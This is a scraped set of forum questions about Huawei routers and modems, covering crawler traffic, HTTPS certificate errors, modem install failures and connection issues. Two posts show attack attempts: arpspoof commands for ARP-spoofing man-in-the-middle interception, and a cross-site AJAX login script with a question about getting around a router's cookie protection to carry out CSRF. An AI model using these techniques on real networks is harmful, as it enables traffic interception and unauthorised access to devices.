Thousands of visits from Huawei ASN, Singapore. Should I worry about them?

I’ve got a website with information I do not want to be replicated.

I’m browsing my visits, and found thousands of visits per day from AS136907, an ASN of Huawei, Singapore. Always with similar IP addresses.

I do not know if such visitors are human real ones, or they are bots crawling my site with hidden intentions.

Any similar experience is welcome.

Why Man In The Middle (MITM) is not working with my Huawei router?

Man-in-the-Middle is not working with my router (Huawei) on my Windows machine/any device.

But it works with another router on my same Windows machine/any device.

When I doing MITM with Huawei router:

Linux MAC: a0:af:bd:c5:21:87   Router's MAC: 7c-11-cb-1f-ad-85 

My Windows ARP table before doing MITM on it:

c:\Users\acer>arp -a  Interface: 192.168.1.113 --- 0x4  Internet Address        Physical Address      Type  192.168.1.1             7c-11-cb-1f-ad-85     dynamic  192.168.1.255           ff-ff-ff-ff-ff-ff     static  224.0.0.022             01-00-5e-00-00-16     static 

arpspoof script to do MITM:

1st terminal:

arpspoof -i wlan0 -t 192.168.1.113 192.168.1.1 

2nd terminal:

arpspoof -i wlan0 -t 192.168.1.1 192.168.1.113 

Then the Widows machine ARP table is:

c:\Users\acer>arp -a  Interface: 192.168.1.113 --- 0x4  Internet Address        Physical Address      Type  192.168.1.1             7c-11-cb-1f-ad-85     dynamic  192.168.1.112           a0:af:bd:c5:21:87     dynamic  192.168.1.255           ff-ff-ff-ff-ff-ff     static  224.0.0.022             01-00-5e-00-00-16     static 

I tried with bettercap, ettercap, my own python script and I done ‘echo 1 > /proc/sys/net/ipv4/ip_forward’ in Linux. It is still not working! Not capturing anything.

The expected ARP table on Windows:

Interface: 192.168.1.113 --- 0x4  Internet Address        Physical Address      Type  192.168.1.1             a0:af:bd:c5:21:87     dynamic  192.168.1.255           ff-ff-ff-ff-ff-ff     static  224.0.0.022             01-00-5e-00-00-16     static 

HUAWEI Router tries to manipulate HTTPS connections?

At home I use a HUAWEI Router (Huawei B528s-23a), the default device which my provider recommends.

In last days I got often a certificate error when opening a website which was obviously not the routers page.

In Safari for example:

Safari: certificate is not trusted

It’s seems that the router answers the SSL-Connection instead of the page I wanted to open. Is there any explanation for this strange behaviour?

ps: I’m not a native English speaker; Please forgive for my potentially mistakes.

Teletalk huawei 3G Modem Install Ubuntu 18.04 LTS error

Installed version: 23.015.15.00.1081 Installing version: 23.015.15.00.1081

The software is exist. Do you want overwrite it? ([Y]/N):y

Local path is: /usr/local/Teletalk

Installing Teletalk…chmod: cannot access ‘/usr/local/Teletalk/config’: No such file or directory grep: /usr/local/Teletalk/SysConfig.dat: No such file or directory chmod: cannot access ‘./driver/‘: No such file or directory ./install: line 474: ./driver/install: No such file or directory chmod: cannot access ‘./sbin/‘: No such file or directory chmod: cannot access ‘./hw_pppd’: No such file or directory chmod: cannot access ‘./hw_pppd’: No such file or directory ./install: line 490: ./hw_pppd/sbin/install_pppd: No such file or directory cp: cannot stat ‘./hw_pppd’: No such file or directory cp: cannot stat ‘/usr/local/Teletalk/qtlib/lib*.so*’: No such file or directory grep: /usr/local/Teletalk/SysConfig.dat: No such file or directory grep: /usr/local/Teletalk/SysConfig.dat: No such file or directory cp: cannot stat ‘/usr/local/Teletalk/sbin/67hw_hook’: No such file or directory chmod: cannot access ‘/etc/pm/sleep.d/67hw_hook’: No such file or directory [ done ]

Finished, press any key to exit

Teletalk Software Link

is it possible to bypass cookie protection to perform a CSRF on HUAWEI HG531 v1 router?

the AJAX login script

var xhr1 = new XMLHttpRequest();     xhr1.open("post", 'https://192.168.1.1/index/login.cgi', false); xhr1.send("Username=admin&Password=6836394be82df057e085fc344c6179d1b50b30224ad0SJ0GQrNWmpsXCSk5so7o73f93282&challange=SJ0GQrNWmpsXCSk5so7o"); 

the problem is it gives me this error

Login Failure: Browser did not support Cookie. Please enable Cookie

and i can’t send a cookie header cause it’s a Forbidden header name ….. the page after i press login it sets the required cookies to perform a login . is there any way around this ?

some lines from the page source code that i think are important

var strCookie = document.cookie;  document.cookie = cookie;  var cookie = "Language=en" + expires + ";  var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$  )' ); 

Huawei mobile WIfi not working on Xubuntu Xenial

I have a problem that I don’t have internet on Xubuntu Xenail using the device Huawei Mobile Wifi (e5220), it’s a USB hotspot device, it conects to 3G+ bands for internet all on its own, and acts as a router that wifi devices can connect to. On windows and puppy linux it works just fine, from what I understand it uses the ethernet protocol through USB, so on windows it shows up as if it were another ehternet connection, but on Puppy Linux it’s seen as wwan0, in either case, it works when it dials itself, not when I have to specify APN or any of that like a regular broadband dongle.

I’ve gotten it to detect it as a broadband adapter on Xubuntu, so I can see the proper ISP name and signal strength, but try as I might, if I add a connection, it doesn’t finish connecting to it, and of course no internet.

Here’s the info from the script:

https://paste.ubuntu.com/p/PC2PDVFVMR/